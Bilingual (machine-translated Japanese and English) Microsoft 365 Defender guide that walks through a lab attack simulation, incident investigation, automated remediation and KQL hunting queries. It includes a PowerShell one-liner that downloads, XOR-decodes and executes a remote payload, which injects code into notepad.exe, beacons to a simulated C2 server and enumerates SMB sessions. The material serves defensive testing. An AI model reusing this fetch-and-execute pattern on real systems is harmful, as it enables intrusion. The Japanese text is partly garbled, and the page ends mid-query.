Defender 攻撃シミュレーションMicrosoft 365実行するRun your Microsoft 365 Defender attack simulations

重要

改善された Microsoft 365 セキュリティ センターが利用できるようになりました。The improved Microsoft 365 security center is now available. この新しいエクスペリエンスにより、Defender for Endpoint、Defender for Office 365、Microsoft 365 Defender などが Microsoft 365 セキュリティ センターに導入されます。This new experience brings Defender for Endpoint, Defender for Office 365, Microsoft 365 Defender, and more into the Microsoft 365 security center. 新機能について説明しますLearn what's new.

計画Planning
計画Planning
準備Prepare
準備Preparation
攻撃のシミュレーション
攻撃のシミュレーションSimulate attack
閉じて要約するClose and summarize
閉じて要約するClose and summarize
お前はここにいる!You are here!

現在、攻撃シミュレーション フェーズに入っている。You're currently in the attack simulation phase.

パイロット環境を準備した後は、Defender インシデント管理とMicrosoft 365の調査と修復機能をテストします。After preparing your pilot environment, it's time to test the Microsoft 365 Defender incident management and automated investigation and remediation capabilities. 高度な手法を活用して検出を非表示にする高度な攻撃をシミュレートするのに役立ちます。We'll help you to simulate a sophisticated attack that leverages advanced techniques to hide from detection. この攻撃は、ドメイン コントローラーで開いたサーバー メッセージ ブロック (SMB) セッションを列挙し、ユーザーのデバイスの最近の IP アドレスを取得します。The attack enumerates opened Server Message Block (SMB) sessions on domain controllers and retrieves recent IP addresses of users' devices. 攻撃のこのカテゴリには、通常、被害者のデバイスにドロップされたファイルは含めされません。これらはメモリ内でのみ発生します。This category of attacks usually doesn't include files dropped on the victim's device—they occur solely in memory. 既存のシステムツールと管理ツールを使用して"土地から離れ"、コードをシステム プロセスに挿入して実行を非表示にします。このような動作により、検出を回避し、デバイス上で保持できます。They "live off the land" by using existing system and administrative tools and inject their code into system processes to hide their execution, Such behavior allows them to evade detection and persist on the device.

このシミュレーションでは、サンプル シナリオは PowerShell スクリプトから始まります。In this simulation, our sample scenario starts with a PowerShell script. ユーザーがスクリプトの実行を騙される可能性があります。A user might be tricked into running a script. または、以前に感染したデバイスから別のコンピューターへのリモート接続からスクリプトが実行される場合があります。攻撃者がネットワーク内で横方向に移動しようとした場合。Or the script might run from a remote connection to another computer from a previously infected device—the attacker attempting to move laterally in the network. 管理者は、さまざまな管理アクティビティを実行するためにリモートでスクリプトを実行する場合も多いので、これらのスクリプトの検出が困難になる場合があります。Detection of these scripts can be difficult because administrators also often run scripts remotely to carry out various administrative activities.

プロセスの挿入と SMB の偵察攻撃の図によるファイルレス PowerShell 攻撃

シミュレーション中、攻撃はシェルコードを一見無実のプロセスに挿入します。During the simulation, the attack injects shellcode into a seemingly innocent process. このシナリオでは、このシナリオを使用notepad.exe。The scenario requires the use of notepad.exe. シミュレーションではこのプロセスを選択しましたが、攻撃者は長時間実行されるシステム プロセス (たとえば、svchost.exe) をターゲットにしている可能性が高svchost.exe。We chose this process for the simulation, but attackers would more likely target a long-running system process, such as svchost.exe. その後、シェルコードは攻撃者のコマンド アンド コントロール (C2) サーバーに問い合わせ、続行方法に関する指示を受け取る。The shellcode then goes on to contact the attacker's command-and-control (C2) server to receive instructions on how to proceed. スクリプトは、ドメイン コントローラー (DC) に対する偵察クエリの実行を試みます。The script attempts executing reconnaissance queries against the domain controller (DC). 偵察により、攻撃者は最近のユーザー ログイン情報に関する情報を取得できます。Reconnaissance allows an attacker to get information about recent user login information. 攻撃者がこの情報を取得すると、ネットワーク内を横方向に移動して、特定の機密性の高いアカウントにアクセスできます。Once attackers have this information, they can move laterally in the network to get to a specific sensitive account

重要

最適な結果を得る場合は、可能な限り攻撃シミュレーションの指示に従ってください。For optimum results, follow the attack simulation instructions as closely as possible.

シミュレーション環境の要件Simulation environment requirements

準備フェーズ中にパイロット環境が既に構成済みである場合は、このシナリオに 2 つのデバイス (テスト デバイスとドメイン コントローラー) が存在するようにします。Since you have already configured your pilot environment during the preparation phase, ensure that you have two devices for this scenario: a test device and a domain controller.

  1. テナントが Defender を有効にMicrosoft 365しますVerify your tenant has enabled Microsoft 365 Defender.

  2. テスト ドメイン コントローラーの構成を確認します。Verify your test domain controller configuration:

  3. テスト デバイスの構成を確認します。Verify test device configuration:

    1. デバイスは、Windows 10バージョン 1903 以降で実行されます。Device runs with Windows 10 version 1903 or a later version.

    2. テスト デバイスはテスト ドメインに参加しています。Test device is joined to the test domain.

    3. [オンにする] をWindows Defender ウイルス対策します。Turn on Windows Defender Antivirus. 問題が発生した場合は、このトラブルシューティング Windows Defender ウイルス対策を参照してくださいIf you are having trouble enabling Windows Defender Antivirus, see this troubleshooting topic.

    4. テスト デバイスが Microsoft Defender for Endpoint にオンボードされているのを確認します。Verify that the test device is onboarded to Microsoft Defender for Endpoint).

既存のテナントを使用してデバイス グループを実装する場合は、テスト デバイス用の専用デバイス グループを作成し、構成 UX で上位レベルにプッシュします。If you use an existing tenant and implement device groups, create a dedicated device group for the test device and push it to top level in configuration UX.

攻撃シナリオのシミュレーションを実行するRun the attack scenario simulation

攻撃シナリオのシミュレーションを実行するには、次のコマンドを実行します。To run the attack scenario simulation:

  1. テスト ユーザー アカウントを使用してテスト デバイスにログインします。Log in to the test device with the test user account.

  2. テスト デバイスWindows PowerShellウィンドウを開きます。Open a Windows PowerShell window on the test device.

  3. 次のシミュレーション スクリプトをコピーします。Copy the following simulation script:

    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
    = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
    -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
    $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
    $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
    

    注意

    Web ブラウザーでこのドキュメントを開いた場合、特定の文字を失わずにフル テキストをコピーしたり、改行を追加したりせずに問題が発生する可能性があります。If you open this document on a web browser, you might encounter problems copying the full text without losing certain characters or introducing extra line breaks. このドキュメントをダウンロードし、Adobe Reader で開きます。Download this document and open it on Adobe Reader.

  4. プロンプトで、コピーしたスクリプトを貼り付け、実行します。At the prompt, paste and run the copied script.

注意

リモート デスクトップ プロトコル (RDP) を使用して PowerShell を実行している場合は 、CTRL-V ホットキーまたは右クリック貼り付けメソッドが機能しないので、RDP クライアントで [クリップボード テキストの種類] コマンドを使用します。If you're running PowerShell using remote desktop protocol (RDP), use the Type Clipboard Text command in the RDP client because the CTRL-V hotkey or right-click-paste method might not work. PowerShell の最近のバージョンでは、そのメソッドを受け入れれなく場合があります。最初にメモリ内の メモ帳 にコピーし、仮想マシンにコピーしてから PowerShell に貼り付ける必要があります。Recent versions of PowerShell sometimes will also not accept that method, you might have to copy to Notepad in memory first, copy it in the virtual machine, and then paste it into PowerShell.

数秒後 、notepad.exe開 きます。A few seconds later, notepad.exe will open. シミュレートされた攻撃コードは、そのコードにnotepad.exe。A simulated attack code will be injected into notepad.exe. 完全なシナリオを体験するためにメモ帳自動的に生成されたインスタンスを開いた状態に保ちます。Keep the automatically generated Notepad instance open to experience the full scenario.

シミュレートされた攻撃コードは、外部 IP アドレス (C2 サーバーのシミュレート) に通信し、SMB を介してドメイン コントローラーに対する偵察を試みる。The simulated attack code will attempt to communicate to an external IP address (simulating the C2 server) and then attempt reconnaissance against the domain controller through SMB.

このスクリプトが完了すると、PowerShell コンソールにメッセージが表示されます。You'll see a message displayed on the PowerShell console when this script completes.

ran NetSessionEnum against [DC Name] with return code result 0

[インシデントと応答の自動化] 機能が動作しているのを確認するには、プロセスを開notepad.exe保持します。To see the Automated Incident and Response feature in action, keep the notepad.exe process open. [インシデントと応答の自動停止] プロセスが表示メモ帳表示されます。You'll see Automated Incident and Response stop the Notepad process.

インシデントの調査Investigate an incident

注意

このシミュレーションを実行する前に、次のビデオを見て、インシデント管理が関連するアラートを調査プロセスの一部としてまとめ、ポータルで見つけ、セキュリティ操作でどのように役立つのかについて説明します。Before we walk you through this simulation, watch the following video to see how incident management helps you piece the related alerts together as part of the investigation process, where you can find it in the portal, and how it can help you in your security operations:

SOC アナリストの視点に切り替えて、セキュリティ センター ポータルで攻撃の調査Microsoft 365開始できます。Switching to the SOC analyst point of view, you can now start to investigate the attack in the Microsoft 365 Security Center portal.

  1. 任意のデバイスMicrosoft 365セキュリティ センター ポータル インシデントキューを開きます。Open the Microsoft 365 Security Center portal incident queue from any device.

  2. メニューから [インシデント] に移動します。Navigate to Incidents from the menu.

    セキュリティ センターの左側のMicrosoft 365に表示されるインシデントのスクリーンショット

  3. シミュレートされた攻撃の新しいインシデントがインシデント キューに表示されます。The new incident for the simulated attack will appear in the incident queue.

    インシデント キューのスクリーンショット

攻撃を 1 つのインシデントとして調査するInvestigate the attack as a single incident

Microsoft 365Defender は分析を関連付け、異なる製品のすべての関連するアラートと調査を 1 つのインシデント エンティティに集約します。Microsoft 365 Defender correlates analytics and aggregates all related alerts and investigations from different products into one incident entity. これにより、Microsoft 365 Defender は、より広範な攻撃ストーリーを示し、SOC アナリストは複雑な脅威を理解して対応できます。By doing so, Microsoft 365 Defender shows a broader attack story, allowing the SOC analyst to understand and respond to complex threats.

このシミュレーション中に生成されたアラートは同じ脅威に関連付けられるので、その結果、1 つのインシデントとして自動的に集計されます。The alerts generated during this simulation are associated with the same threat, and as a result, are automatically aggregated as a single incident.

インシデントを表示するには、次の方法を実行します。To view the incident:

  1. インシデント キュー に移動 します。Navigate to the Incidents queue.

    ナビゲーション メニューからのインシデントのスクリーンショット

  2. インシデント名の左側にある円をクリックして、最新のアイテムを選択します。Select the newest item by clicking on the circle located left of the incident name. サイド パネルには、関連するアラートを含むインシデントに関する追加情報が表示されます。A side panel displays additional information about the incident, including all the related alerts. 各インシデントには、含まれるアラートの属性に基づいて説明する一意の名前があります。Each incident has a unique name that describes it based on the attributes of the alerts it includes.

    シミュレーション中に生成されたアラートが集計されるインシデント ページのスクリーンショット

    ダッシュボードに表示されるアラートは、サービス リソース (Microsoft Defender for Identity、Microsoft Cloud App Security、Microsoft Defender for Endpoint、Microsoft 365 Defender、および microsoft Defender for Office 365 に基づいてフィルター処理できます。The alerts that show in the dashboard can be filtered based on service resources: Microsoft Defender for Identity, Microsoft Cloud App Security, Microsoft Defender for Endpoint, Microsoft 365 Defender, and Microsoft Defender for Office 365.

  3. インシデント の詳細を取得するには、[ インシデント ページを開く] を選択します。Select Open incident page to get more information about the incident.

    [インシデント ] ページ では、インシデントに関連するアラートと情報を確認できます。In the Incident page, you can see all the alerts and information related to the incident. この情報には、アラートに関連するエンティティとアセット、アラートの検出ソース (Microsoft Defender for Identity、EDR)、およびアラートがリンクされた理由が含まれます。The information includes the entities and assets that are involved in the alert, the detection source of the alerts (Microsoft Defender for Identity, EDR), and the reason they were linked together. インシデントアラートリストを確認すると、攻撃の進行状況が表示されます。Reviewing the incident alert list shows the progression of the attack. このビューから、個々のアラートを確認および調査できます。From this view, you can see and investigate the individual alerts.

    右側のメニューから [ インシデント の管理] をクリックして、インシデントにタグを付け、自分に割り当て、コメントを追加することもできます。You can also click Manage incident from the right-hand menu, to tag the incident, assign it to yourself, and add comments.

    [インシデントの管理] をクリックする場所のスクリーンショット

    インシデントにタグを付け、自分に割り当て、コメントを追加できるインシデント管理パネルのフィールドのスクリーンショットScreenshot of the fields on the manage incident panel where you can tag the incident, assign it to yourself, and add comments

生成されたアラートを確認するReview generated alerts

シミュレートされた攻撃中に生成されたアラートの一部を見てみよ。Let's look at some of the alerts generated during the simulated attack.

注意

シミュレートされた攻撃中に生成されたアラートの一部のみを実行します。We'll walk through only a few of the alerts generated during the simulated attack. テスト デバイスで実行されている Windows および Microsoft 365 Defender 製品のバージョンによっては、少し異なる順序で表示されるアラートが多く表示される場合があります。Depending on the version of Windows and the Microsoft 365 Defender products running on your test device, you might see more alerts that appear in a slightly different order.

生成されたアラートのスクリーンショット

アラート: 疑わしいプロセスの挿入が観察されました (ソース: Microsoft Defender for Endpoint EDR)Alert: Suspicious process injection observed (Source: Microsoft Defender for Endpoint EDR)

高度な攻撃者は、高度でステルス性の高い方法を使用してメモリを保持し、検出ツールから隠します。Advanced attackers use sophisticated and stealthy methods to persist in memory and hide from detection tools. 一般的な手法の 1 つは、悪意のある実行可能ファイルではなく、信頼できるシステム プロセス内から操作し、検出ツールやセキュリティ操作が悪意のあるコードを見つけるのを難しくする方法です。One common technique is to operate from within a trusted system process rather than a malicious executable, making it hard for detection tools and security operations to spot the malicious code.

SOC アナリストがこれらの高度な攻撃をキャッチできるよう、Microsoft Defender for Endpoint のディープ メモリ センサーは、さまざまなクロスプロセス コードインジェクション手法をこれまでにない可視性でクラウド サービスに提供します。To allow the SOC analysts to catch these advanced attacks, deep memory sensors in Microsoft Defender for Endpoint provide our cloud service with unprecedented visibility into a variety of cross-process code injection techniques. 次の図は、Defender for Endpoint がコードを挿入しようとして検出され、警告を受け取ったnotepad.exe。 The following figure shows how Defender for Endpoint detected and alerted on the attempt to inject code to notepad.exe.

悪意のある可能性のあるコードの挿入に関する警告のスクリーンショット

アラート: コマンド ライン引数を使用しないプロセス実行で予期しない動作が発生する (ソース: エンドポイントの Microsoft Defender EDR)Alert: Unexpected behavior observed by a process run with no command-line arguments (Source: Microsoft Defender for Endpoint EDR)

Microsoft Defender for Endpoint の検出は、攻撃手法の最も一般的な属性をターゲットにしている場合が多い。Microsoft Defender for Endpoint detections often target the most common attribute of an attack technique. このメソッドは、耐久性を確保し、攻撃者が新しい戦術に切り替えるバーを上げる。This method ensures durability and raises the bar for attackers to switch to newer tactics.

大規模な学習アルゴリズムを使用して、組織内および世界中の共通プロセスの通常の動作を確立し、これらのプロセスが異常な動作を示す状況を監視します。We employ large-scale learning algorithms to establish the normal behavior of common processes within an organization and worldwide and watch for when these processes show anomalous behaviors. これらの異常な動作は、多くの場合、余分なコードが導入され、それ以外の場合は信頼できるプロセスで実行されている状態を示しています。These anomalous behaviors often indicate that extraneous code was introduced and are running in an otherwise trusted process.

このシナリオでは、 プロセスが notepad.exe、外部の場所との通信を伴う異常な動作を示しています。For this scenario, the process notepad.exe is exhibiting abnormal behavior, involving communication with an external location. この結果は、悪意のあるコードの導入と実行に使用される特定のメソッドとは独立しています。This outcome is independent of the specific method used to introduce and execute the malicious code.

注意

このアラートは、追加のバックエンド処理を必要とする機械学習モデルに基づくため、ポータルでこのアラートが表示されるには時間がかかる場合があります。Because this alert is based on machine-learning models that require additional backend processing, it might take some time before you see this alert in the portal.

アラートの詳細には、調査を展開するピボットとして使用できるインジケーターである外部 IP アドレスが含まれます。Notice that the alert details include the external IP address—an indicator that you can use as a pivot to expand investigation.

アラート プロセス ツリーで IP アドレスを選択して、[IP アドレスの詳細] ページを表示します。Select the IP address in the alert process tree to view the IP address details page.

コマンド ライン引数を使用しないプロセス実行による予期しない動作に関するアラートのスクリーンショット

次の図は、選択した IP アドレスの詳細ページを表示します (アラート プロセス ツリーの IP アドレスをクリックします)。The following figure displays the selected IP Address details page (clicking on IP address in the Alert process tree). [IP アドレスの詳細] ページのスクリーンショットScreenshot of the IP address details page

アラート: ユーザーと IP アドレスの偵察 (SMB) (ソース: Microsoft Defender for Identity)Alert: User and IP address reconnaissance (SMB) (Source: Microsoft Defender for Identity)

サーバー メッセージ ブロック (SMB) プロトコルを使用した列挙により、攻撃者は、ネットワークを横方向に移動して特定の機密性の高いアカウントにアクセスするのに役立つ、最近のユーザー ログオン情報を取得できます。Enumeration using Server Message Block (SMB) protocol enables attackers to get recent user logon information that helps them move laterally through the network to access a specific sensitive account.

この検出では、SMB セッション列挙がドメイン コントローラーに対して実行されると、アラートがトリガーされます。In this detection, an alert is triggered when the SMB session enumeration runs against a domain controller.

ユーザーと IP アドレスの偵察に関する Microsoft Defender for Identity アラートのスクリーンショット

デバイスのタイムラインを確認する [Microsoft Defender for Endpoint]Review the device timeline [Microsoft Defender for Endpoint]

このインシデントのさまざまなアラートを確認した後、前に調査したインシデント ページに戻ります。After exploring the various alerts in this incident, navigate back to the incident page you investigated earlier. インシデント ページ の [デバイス ] タブを選択して、Microsoft Defender for Endpoint および Microsoft Defender for Identity によって報告されたこのインシデントに関連するデバイスを確認します。Select the Devices tab in the incident page to review the devices involved in this incident as reported by Microsoft Defender for Endpoint and Microsoft Defender for Identity.

攻撃が行われたデバイスの名前を選択して、その特定のデバイスのエンティティ ページを開きます。Select the name of the device where the attack was conducted, to open the entity page for that specific device. そのページで、トリガーされたアラートと関連イベントを確認できます。In that page, you can see alerts that were triggered and related events.

[タイムライン ] タブ を選択して、デバイスのタイムラインを開き、発生したアラートと一緒にデバイスで観察されたイベントと動作を時系列順に表示します。Select the Timeline tab to open the device timeline and view all events and behaviors observed on the device in chronological order, interspersed with the alerts raised.

動作を含むデバイスタイムラインのスクリーンショット

より興味深い動作の一部を展開すると、プロセス ツリーなどの有用な詳細が提供されます。Expanding some of the more interesting behaviors provides useful details, such as process trees.

たとえば、警告イベント [疑わしいプロセスの挿入が観察されるまで 下にスクロールしますFor example, scroll down until you find the alert event Suspicious process injection observed. その下 powershell.exe プロセス notepad.exeに挿入するイベントを選択し、この動作の完全なプロセス ツリーをサイド ウィンドウの [イベント エンティティ] グラフに表示します。Select the powershell.exe injected to notepad.exe process event below it, to display the full process tree for this behavior under the Event entities graph on the side pane. 必要に応じて、検索バーを使用してフィルター処理を行います。Use the search bar for filtering if necessary.

選択した PowerShell ファイル作成動作のプロセス ツリーのスクリーンショット

ユーザー情報を確認する [Microsoft Cloud App Security]Review the user information [Microsoft Cloud App Security]

インシデント ページで、[ユーザー] タブを 選択して、攻撃に関与するユーザーの一覧を表示します。On the incident page, select the Users tab to display the list of users involved in the attack. この表には、各ユーザーの調査優先度スコアを含む、各ユーザーに関する 追加情報が含 まれている。The table contains additional information about each user, including each user's Investigation Priority score.

ユーザー名を選択して、ユーザーのプロファイル ページを開き、詳細な調査を行います。Select the user name to open the user's profile page where further investigation can be conducted. リスクの高いユーザーの調査について詳しくは、以下の記事を参照してくださいRead more about investigating risky users.

ユーザー ページCloud App Securityスクリーンショット

調査と修復の自動化Automated investigation and remediation

注意

このシミュレーションを実行する前に、次のビデオを見て、自動自己修復とは何か、ポータルでどこで見つけるか、セキュリティ操作でどのように役立つのかを理解してください。Before we walk you through this simulation, watch the following video to get familiar with what automated self-healing is, where to find it in the portal, and how it can help in your security operations:

セキュリティ センター ポータルでインシデントMicrosoft 365戻します。Navigate back to the incident in the Microsoft 365 Security Center portal. [インシデント] ページの****[調査] タブには、Microsoft Defender for Identity と Microsoft Defender for Endpoint によってトリガーされた自動調査が表示されます。The Investigations tab in the Incident page shows the automated investigations that were triggered by Microsoft Defender for Identity and Microsoft Defender for Endpoint. 次のスクリーンショットは、Defender for Endpoint によってトリガーされた自動調査のみを表示します。The screenshot below displays only the automated investigation triggered by Defender for Endpoint. 既定では、Defender for Endpoint はキュー内にあるアーティファクトを自動的に修復します。修復が必要です。By default, Defender for Endpoint automatically remediates the artifacts found in the queue, which requires remediation.

インシデントに関連する自動調査のスクリーンショット

調査をトリガーしたアラートを選択して、[調査の詳細] ページを開 きます。Select the alert that triggered an investigation to open the Investigation details page. 次の詳細が表示されます。You'll see the following details:

  • 自動調査をトリガーしたアラート。Alert(s) that triggered the automated investigation.
  • 影響を受け取ったユーザーとデバイス。Impacted users and devices. 追加のデバイスでインジケーターが見つかった場合は、これらの追加のデバイスも一覧表示されます。If indicators are found on additional devices, these additional devices will be listed as well.
  • 証拠の一覧。List of evidence. ファイル、プロセス、サービス、ドライバー、ネットワーク アドレスなど、検出および分析されたエンティティ。The entities found and analyzed, such as files, processes, services, drivers, and network addresses. これらのエンティティは、アラートに対して考えられる関係について分析され、良性または悪意のあると評価されます。These entities are analyzed for possible relationships to the alert and rated as benign or malicious.
  • 脅威が見つかりました。Threats found. 調査中に検出された既知の脅威。Known threats that are found during the investigation.

注意

タイミングによっては、自動調査がまだ実行されている可能性があります。Depending on timing, the automated investigation might still be running. 証拠を収集して分析し、結果を確認する前に、プロセスが完了するまで数分待ちます。Wait a few minutes for the process to complete before you collect and analyze the evidence and review the results. [調査の 詳細] ページを 更新して、最新の結果を取得します。Refresh the Investigation details page to get the latest findings.

[調査の詳細] ページのスクリーンショット

自動化された調査の間、Microsoft Defender for Endpoint は修復が必要な成果物の 1 notepad.exeプロセスを特定しました。During the automated investigation, Microsoft Defender for Endpoint identified the notepad.exe process, which was injected as one of the artifacts requiring remediation. Defender for Endpoint は、自動修復の一環として疑わしいプロセスの挿入を自動的に停止します。Defender for Endpoint automatically stops the suspicious process injection as part of the automated remediation.

テスト デバイス上 notepad.exe プロセスの一覧から表示されなくなります。You can see notepad.exe disappear from the list of running processes on the test device.

インシデントを解決するResolve the incident

調査が完了し、修復が確認された後、インシデントを閉じます。After the investigation is complete and confirmed to be remediated, close the incident.

[インシデント の管理] を選択しますSelect Manage incident. 状態を [インシデントの解決 ] に設定し 、関連する分類を選択します。Set the status to Resolve incident and select the relevant classification.

インシデントが解決すると、セキュリティ センターと関連するポータルMicrosoft 365関連付けられているすべてのアラートが閉じます。When the incident is resolved, it closes all of the associated alerts in Microsoft 365 Security Center and in the related portals.

[インシデントの管理] パネルを開いたインシデント ページのスクリーンショットで、スイッチをクリックしてインシデントを解決できます。

これにより、インシデント管理と自動調査と修復シナリオの攻撃シミュレーションがラップされます。This wraps up the attack simulation for the incident management and automated investigation and remediation scenarios. 次のシミュレーションでは、潜在的に悪意のあるファイルに対する予防的な脅威の検出を実行します。The next simulation will take you through proactive threat hunting for potentially malicious files.

高度なハンティング シナリオAdvanced hunting scenario

注意

シミュレーションを実行する前に、次のビデオを見て高度な狩猟の概念を理解し、ポータルで検索できる場所を確認し、セキュリティ操作でどのように役立つのか確認してください。Before we walk you through the simulation, watch the following video to understand the advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations:

ハンティング環境の要件Hunting environment requirements

このシナリオでは、1 つの内部メールボックスとデバイスが必要です。There's a single internal mailbox and device required for this scenario. テスト メッセージを送信するには、外部メール アカウントも必要です。You'll also need an external email account to send the test message.

  1. テナントが Defender を有効にMicrosoft 365しますVerify that your tenant has enabled Microsoft 365 Defender.
  2. 電子メールの受信に使用するターゲット メールボックスを特定します。Identify a target mailbox to be used for receiving email. a.a. このメールボックスは、Microsoft Defender によって監視され、Office 365必要があります。This mailbox must be monitored by Microsoft Defender for Office 365 b. 要件 3 のデバイスは、このメールボックスにアクセスする必要がありますThe device from requirement 3 needs to access this mailbox
  3. テスト デバイスを構成します。a.Configure a test device: a. バージョン 1903 以降Windows 10を使用してください。Make sure you are using Windows 10 version 1903 or later version. b.b. テスト デバイスをテスト ドメインに参加します。Join the test device to the test domain. c.c. [オンにする] をWindows Defender ウイルス対策します。Turn on Windows Defender Antivirus. 問題が発生した場合は、このトラブルシューティング Windows Defender ウイルス対策を参照してくださいIf you are having trouble enabling Windows Defender Antivirus, see this troubleshooting topic. d.d. エンドポイント用 Microsoft Defender にオンボードしますOnboard to Microsoft Defender for Endpoint.

シミュレーションを実行するRun the simulation

  1. 外部メール アカウントから、テスト環境の要件セクションの手順 2 で識別されたメールボックスに電子メールを送信します。From an external email account, send an email to the mailbox identified in step 2 of the test environment requirements section. 既存の電子メール フィルター ポリシーで許可される添付ファイルを含める。Include an attachment that will be allowed through any existing email filter policies. このファイルは、悪意のあるファイルや実行可能ファイルである必要があります。This file does not need to be malicious or an executable. 推奨されるファイルの種類は、.pdf、.exe (許可されている場合)、または Word ファイルなどのOfficeドキュメントです。Suggested file types are .pdf, .exe (if allowed), or Office document such as a Word file.
  2. テスト環境の要件セクションの手順 3 で定義されているデバイスから送信された電子メールを開きます。Open the sent email from the device configured as defined in step 3 of the test environment requirements section. 添付ファイルを開くか、ファイルをデバイスに保存します。Either open the attachment or save the file to the device.

Go huntingGo hunting

  1. ポータルを開 security.microsoft.com します。Open the security.microsoft.com portal.

  2. [ハンティング と 高度な>に移動しますNavigate to Hunting > Advanced hunting.

    M365 セキュリティ センター ポータル ナビゲーション バーでの高度な検索のスクリーンショット

  3. 電子メール イベントの収集から始まるクエリを作成します。Build a query that starts by gathering email events.

    1. クエリ ウィンドウで、[新規] を選択します。From the query pane, select New.

    2. スキーマから EmailEvents テーブルをダブルクリックします。Double-click on the EmailEvents table from the schema.

      EmailEvents
      
    3. 時間枠を過去 24 時間に変更します。Change the time frame to the last 24 hours. 上記のシミュレーションを実行した際に送信したメールが過去 24 時間だったと仮定し、それ以外の場合は時間枠を変更します。Assuming the email you sent when you ran the simulation above was in the past 24 hours, otherwise change the time frame.

      タイム フレームを変更できる場所のスクリーンショット。

    4. クエリを実行します。Run the query. パイロットの環境によっては、多くの結果が得られます。You may have many results depending on the environment for the pilot.

      注意

      データの取得を制限するオプションのフィルター処理については、次の手順を参照してください。See the next step for filtering options to limit data return.

      高度な検索クエリ結果のスクリーンショット

      注意

      高度な検索では、クエリ結果が表形式のデータとして表示されます。Advanced hunting displays query results as tabular data. グラフなどの他の形式のデータを表示することもできます。You can also opt to view the data in other format types such as charts.

    5. 結果を確認し、開いたメールを識別できる場合を確認します。Look at the results and see if you can identify the email you opened. 高度な検索でメッセージが表示されるには、最大で 2 時間かかる場合があります。It may take up to 2 hours for the message to show up in advanced hunting. 電子メール環境が大きく、結果が多い場合は、[フィルターの表示]オプションを使用してメッセージを見つける必要があります。If the email environment is large and there are many results, you might want to use the Show Filters option to find the message.

      サンプルでは、メールが Yahoo アカウントから送信されました。In the sample, the email was sent from a Yahoo account. +[SenderFromDomain]セクション yahoo.com 横にあるアイコンをクリックし、[適用] をクリックして、選択したドメインをクエリに追加します。Click the + icon beside yahoo.com under the SenderFromDomain section and then click Apply to add the selected domain to the query. [シミュレーションの実行] の手順 1 のテスト メッセージの送信に使用されたドメインまたは電子メール アカウントを使用して、結果をフィルター処理します。Use the domain or email account that was used to send the test message in step 1 of Run the Simulation to filter your results. クエリを再度実行して、より小さい結果セットを取得して、シミュレーションからのメッセージが表示されるのを確認します。Run the query again to get a smaller result set to verify that you see the message from the simulation.

      フィルターのスクリーンショット。

      EmailEvents
      | where SenderMailFromDomain == "yahoo.com"
      
    6. クエリの結果の行をクリックして、レコードを検査できます。Click the resulting rows from the query so you can inspect the record.

      高度な検索結果が選択されている場合に開く検査レコード側パネルのスクリーンショット

  4. メールが表示されるのを確認したので、添付ファイルのフィルターを追加します。Now that you have verified that you can see the email, add a filter for the attachments. 環境内の添付ファイルを含むすべてのメールに焦点を当てる。Focus on all emails with attachments in the environment. このシナリオでは、環境から送信されるメールではなく、受信メールに重点を置きます。For this scenario, focus on inbound emails, not those that are being sent out from your environment. 追加したフィルターを削除して、メッセージを見つけて "メッセージ" を追加|AttachmentCount > 0EmailDirection == "Inbound""Remove any filters you have added to locate your message and add "| where AttachmentCount > 0 and EmailDirection == "Inbound""

    次のクエリは、すべての電子メール イベントに対する最初のクエリよりも短いリストを持つ結果を表示します。The following query will show you the result with a shorter list than your initial query for all email events:

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    
  5. 次に、添付ファイルに関する情報 (ファイル名、ハッシュなど) を結果セットに含める。Next, include the information about the attachment (such as: file name, hashes) to your result set. これを行うには 、EmailAttachmentInfo テーブルに参加 します。To do so, join the EmailAttachmentInfo table. 参加に使用する一般的なフィールドは 、NetworkMessageIdRecipientObjectId ですThe common fields to use for joining, in this case are NetworkMessageId and RecipientObjectId.

    次のクエリには、追加の行 "| project-rename EmailTimestamp=Timestamp" は、次の手順で追加するファイルアクションに関連するタイムスタンプとメールに関連したタイムスタンプを識別するのに役立ちます。The following query also includes an additional line "| project-rename EmailTimestamp=Timestamp" that'll help identify which timestamp was related to the email versus timestamps related to file actions that you'll add in the next step.

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    
  6. 次に 、EmailAttachmentInfo テーブルの SHA256 値を使用して、そのハッシュの DeviceFileEvents (エンドポイントで発生したファイル アクション) を検索します。Next, use the SHA256 value from the EmailAttachmentInfo table to find DeviceFileEvents (file actions that happened on the endpoint) for that hash. ここでの共通フィールドは、添付ファイルの SHA256 ハッシュです。The common field here will be the SHA256 hash for the attachment.

    結果の表には、エンドポイント (Microsoft Defender for Endpoint) の詳細 (デバイス名、実行されたアクション (この場合は FileCreated イベントのみを含むフィルター処理)、ファイルが格納された場所が含まれます。The resulting table now includes details from the endpoint (Microsoft Defender for Endpoint) such as device name, what action was done (in this case, filtered to only include FileCreated events), and where the file was stored. プロセスに関連付けられたアカウント名も含まれます。The account name associated with the process will also be included.

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
    | project-rename EmailTimestamp=Timestamp
    | join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
    | join DeviceFileEvents on SHA256
    | where ActionType == "FileCreated"
    

    これで、ユーザーが添付ファイルを開いた、または保存した受信メールを識別するクエリを作成しました。You've now created a query that'll identify all inbound emails where the user opened or saved the attachment. このクエリを絞り込み、特定の送信者ドメイン、ファイル サイズ、ファイルの種類などについてフィルター処理することもできます。You can also refine this query to filter for specific sender domains, file sizes, file types, and so on.

  7. 関数は、有病率、署名者、発行者情報などのファイルに関するより多くの TI データを取得できる、特別な種類の結合です。ファイルの詳細を取得するには 、FileProfile() 関数エンリッチメントを 使用します。Functions are a special kind of join, which let you pull more TI data about a file like its prevalence, signer and issuer info, etc. To get more details on the file, use the FileProfile() function enrichment:

    EmailEvents
    | where AttachmentCount > 0 and EmailDirection == "Inbound"
